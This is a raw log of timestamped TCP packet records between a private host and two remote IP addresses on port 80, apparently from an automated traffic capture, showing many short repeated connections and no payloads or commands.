Oct 24, 2024 21:23:24.192142010 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192174911 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192203045 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.192209959 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192244053 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192261934 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.192279100 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192313910 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192327976 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.192348957 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192384005 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192399025 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.192677975 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192706108 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192722082 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.192740917 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192775011 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192790985 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.192805052 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192837954 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192856073 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.192872047 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192904949 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192931890 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.192939043 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192972898 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.192990065 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.193008900 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.193042040 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.193057060 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.193079948 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.193109035 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.193135023 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.193150997 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.194386959 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.194473982 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 24, 2024 21:23:24.194530010 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:24.260371923 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 24, 2024 21:23:25.845045090 CEST	49171	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:25.850718021 CEST	80	49171	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:25.850780964 CEST	49171	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:25.852368116 CEST	49171	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:25.857739925 CEST	80	49171	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:25.857785940 CEST	49171	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:25.863651991 CEST	80	49171	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:26.884572029 CEST	80	49171	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:26.886643887 CEST	49171	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:26.992702961 CEST	49172	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:27.158338070 CEST	80	49171	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:27.158399105 CEST	49171	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:27.158454895 CEST	80	49171	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:27.158495903 CEST	49171	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:27.159765005 CEST	80	49171	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:27.159804106 CEST	80	49172	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:27.159863949 CEST	49172	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:27.161587000 CEST	49172	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:27.167773008 CEST	80	49172	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:27.167849064 CEST	49172	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:27.174731970 CEST	80	49172	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:29.808551073 CEST	80	49172	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:29.808662891 CEST	49172	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:29.815026999 CEST	80	49172	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:29.815133095 CEST	49172	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:29.870043039 CEST	49173	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:29.875705957 CEST	80	49173	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:29.875961065 CEST	49173	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:29.877360106 CEST	49173	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:29.882927895 CEST	80	49173	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:29.882996082 CEST	49173	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:29.888906002 CEST	80	49173	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:30.931631088 CEST	80	49173	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:30.931919098 CEST	49173	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:30.937971115 CEST	80	49173	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:30.938141108 CEST	49173	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:31.070426941 CEST	49174	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:31.076745033 CEST	80	49174	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:31.076831102 CEST	49174	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:31.079195023 CEST	49174	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:31.085498095 CEST	80	49174	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:31.085553885 CEST	49174	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:31.091229916 CEST	80	49174	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:32.518603086 CEST	80	49174	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:32.518743992 CEST	49174	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:32.525579929 CEST	80	49174	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:32.525665045 CEST	49174	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:32.703437090 CEST	49175	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:32.709330082 CEST	80	49175	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:32.709546089 CEST	49175	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:32.712872982 CEST	49175	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:32.718646049 CEST	80	49175	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:32.718723059 CEST	49175	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:32.724399090 CEST	80	49175	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:33.891859055 CEST	80	49175	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:33.892143011 CEST	49175	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:34.120003939 CEST	49176	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:34.211647987 CEST	49175	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:34.305427074 CEST	80	49175	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:34.305449963 CEST	80	49175	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:34.305490017 CEST	49175	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:34.305516005 CEST	49175	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:34.306662083 CEST	80	49175	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:34.306750059 CEST	49175	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:34.310570002 CEST	80	49175	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:34.310589075 CEST	80	49175	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:34.310606956 CEST	80	49176	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:34.310612917 CEST	49175	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:34.310625076 CEST	80	49175	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:34.310699940 CEST	49176	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:34.313005924 CEST	49176	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:34.319031000 CEST	80	49176	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:34.319093943 CEST	49176	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:34.325130939 CEST	80	49176	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:36.394407034 CEST	80	49176	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:36.394613981 CEST	49176	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:36.400835037 CEST	80	49176	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:36.400898933 CEST	49176	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:36.537271023 CEST	49177	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:36.543142080 CEST	80	49177	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:36.543231964 CEST	49177	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:36.544878006 CEST	49177	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:36.550276041 CEST	80	49177	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:36.550345898 CEST	49177	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:36.555902958 CEST	80	49177	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:37.743582964 CEST	80	49177	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:37.743710995 CEST	49177	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:37.750077963 CEST	80	49177	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:37.750148058 CEST	49177	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:37.876086950 CEST	49178	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:37.881735086 CEST	80	49178	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:37.881803036 CEST	49178	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:37.883402109 CEST	49178	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:37.888691902 CEST	80	49178	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:37.888748884 CEST	49178	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:37.894340992 CEST	80	49178	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:38.952395916 CEST	80	49178	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:38.952621937 CEST	49178	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:38.958627939 CEST	80	49178	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:38.958726883 CEST	49178	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:39.081839085 CEST	49179	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:39.087342024 CEST	80	49179	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:39.087399960 CEST	49179	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:39.088957071 CEST	49179	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:39.094336987 CEST	80	49179	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:39.094383955 CEST	49179	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:39.099772930 CEST	80	49179	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:40.185728073 CEST	80	49179	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:40.186012030 CEST	49179	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:40.192064047 CEST	80	49179	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:40.192148924 CEST	49179	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:40.338282108 CEST	49180	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:40.343720913 CEST	80	49180	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:40.343810081 CEST	49180	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:40.346195936 CEST	49180	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:40.351524115 CEST	80	49180	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:40.351612091 CEST	49180	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:40.356935978 CEST	80	49180	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:41.449007034 CEST	80	49180	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:41.449167013 CEST	49180	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:41.455373049 CEST	80	49180	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:41.455481052 CEST	49180	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:41.624707937 CEST	49181	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:41.630359888 CEST	80	49181	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:41.630448103 CEST	49181	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:41.632150888 CEST	49181	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:41.637772083 CEST	80	49181	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:41.637883902 CEST	49181	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:41.643420935 CEST	80	49181	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:42.717688084 CEST	80	49181	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:42.717883110 CEST	49181	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:42.724663019 CEST	80	49181	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:42.724786043 CEST	49181	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:42.890897036 CEST	49182	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:42.896408081 CEST	80	49182	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:42.896595001 CEST	49182	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:42.898226023 CEST	49182	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:42.903640985 CEST	80	49182	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:42.903712988 CEST	49182	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:42.909135103 CEST	80	49182	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:43.957998037 CEST	80	49182	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:43.958200932 CEST	49182	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:43.964080095 CEST	80	49182	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:43.964132071 CEST	49182	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:44.155247927 CEST	49183	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:44.164587975 CEST	80	49183	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:44.164659023 CEST	49183	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:44.166310072 CEST	49183	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:44.171940088 CEST	80	49183	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:44.172010899 CEST	49183	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:44.178004980 CEST	80	49183	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:45.248500109 CEST	80	49183	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:45.248594999 CEST	49183	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:45.255136013 CEST	80	49183	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:45.255201101 CEST	49183	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:45.409641027 CEST	49184	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:45.415194035 CEST	80	49184	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:45.415252924 CEST	49184	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:45.416917086 CEST	49184	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:45.422278881 CEST	80	49184	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:45.422327042 CEST	49184	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:45.427715063 CEST	80	49184	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:46.621321917 CEST	80	49184	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:46.621499062 CEST	49184	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:46.791759968 CEST	49185	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:46.858269930 CEST	80	49184	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:46.858283043 CEST	80	49184	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:46.858460903 CEST	49184	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:46.868570089 CEST	80	49184	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:46.868592024 CEST	80	49185	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:46.868747950 CEST	49185	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:46.874614954 CEST	49185	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:46.883161068 CEST	80	49185	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:46.883325100 CEST	49185	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:46.890700102 CEST	80	49185	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:47.965843916 CEST	80	49185	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:47.970541954 CEST	49185	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:47.977145910 CEST	80	49185	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:47.977216005 CEST	49185	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:48.392695904 CEST	49186	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:48.398964882 CEST	80	49186	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:48.399036884 CEST	49186	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:48.401350975 CEST	49186	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:48.406747103 CEST	80	49186	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:48.406791925 CEST	49186	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:48.412154913 CEST	80	49186	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:49.409387112 CEST	80	49186	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:49.409575939 CEST	49186	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:49.415575981 CEST	80	49186	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:49.415693998 CEST	49186	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:49.553117990 CEST	49187	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:49.558657885 CEST	80	49187	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:49.558751106 CEST	49187	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:49.560369015 CEST	49187	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:49.566589117 CEST	80	49187	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:49.566653013 CEST	49187	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:49.572820902 CEST	80	49187	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:50.569111109 CEST	80	49187	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:50.569417953 CEST	49187	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:50.575297117 CEST	80	49187	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:50.575372934 CEST	49187	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:50.739213943 CEST	49188	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:50.744702101 CEST	80	49188	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:50.744769096 CEST	49188	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:50.746375084 CEST	49188	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:50.751825094 CEST	80	49188	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:50.751878023 CEST	49188	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:50.757452011 CEST	80	49188	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:51.776329041 CEST	80	49188	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:51.776490927 CEST	49188	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:51.783241987 CEST	80	49188	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:51.783391953 CEST	49188	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:51.948210001 CEST	49189	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:51.953680038 CEST	80	49189	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:51.953922987 CEST	49189	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:51.955508947 CEST	49189	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:51.960902929 CEST	80	49189	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:51.961137056 CEST	49189	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:51.966820955 CEST	80	49189	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:53.031290054 CEST	80	49189	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:53.031404972 CEST	49189	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:53.037215948 CEST	80	49189	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:53.037280083 CEST	49189	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:53.233946085 CEST	49190	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:53.497740030 CEST	80	49190	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:53.497843981 CEST	49190	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:53.499456882 CEST	49190	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:53.505244017 CEST	80	49190	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:53.505309105 CEST	49190	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:53.510729074 CEST	80	49190	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:55.553410053 CEST	80	49190	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:55.553591967 CEST	49190	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:55.559391022 CEST	80	49190	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:55.559469938 CEST	49190	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:55.712501049 CEST	49191	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:55.717974901 CEST	80	49191	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:55.718048096 CEST	49191	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:55.720447063 CEST	49191	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:55.726026058 CEST	80	49191	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:55.726103067 CEST	49191	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:55.731861115 CEST	80	49191	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:56.808187962 CEST	80	49191	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:56.808264971 CEST	49191	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:56.814340115 CEST	80	49191	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:56.814393044 CEST	49191	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:56.959609985 CEST	49192	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:56.965219021 CEST	80	49192	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:56.965289116 CEST	49192	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:56.966893911 CEST	49192	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:56.972305059 CEST	80	49192	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:56.972372055 CEST	49192	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:56.977768898 CEST	80	49192	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:59.106962919 CEST	80	49192	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:59.107069016 CEST	49192	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:59.107737064 CEST	80	49192	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:59.107793093 CEST	49192	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:59.107824087 CEST	80	49192	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:59.107873917 CEST	49192	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:59.108335018 CEST	80	49192	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:59.108381987 CEST	49192	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:59.113439083 CEST	80	49192	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:59.113451958 CEST	80	49192	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:59.113488913 CEST	49192	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:59.262439966 CEST	49193	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:59.267873049 CEST	80	49193	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:59.267949104 CEST	49193	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:59.269597054 CEST	49193	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:59.275003910 CEST	80	49193	94.156.177.220	192.168.2.22
Oct 24, 2024 21:23:59.275065899 CEST	49193	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:23:59.280869961 CEST	80	49193	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:00.322951078 CEST	80	49193	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:00.323075056 CEST	49193	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:00.329943895 CEST	80	49193	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:00.330012083 CEST	49193	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:00.453836918 CEST	49194	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:00.642261028 CEST	80	49194	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:00.642374039 CEST	49194	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:00.657490969 CEST	49194	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:00.662857056 CEST	80	49194	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:00.662976027 CEST	49194	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:00.668365955 CEST	80	49194	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:01.787553072 CEST	80	49194	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:01.787704945 CEST	49194	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:01.793729067 CEST	80	49194	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:01.793833017 CEST	49194	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:01.914833069 CEST	49195	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:01.920275927 CEST	80	49195	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:01.920362949 CEST	49195	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:01.921905041 CEST	49195	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:01.927402973 CEST	80	49195	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:01.927480936 CEST	49195	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:01.932975054 CEST	80	49195	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:03.086314917 CEST	80	49195	94.156.177.220	192.168.2.22
Oct 24, 2024 21:24:03.086400986 CEST	49195	80	192.168.2.22	94.156.177.220
Oct 24, 2024 21:24:03.093209982 CEST	80	49195	94.156.177.220	192.168.2.22
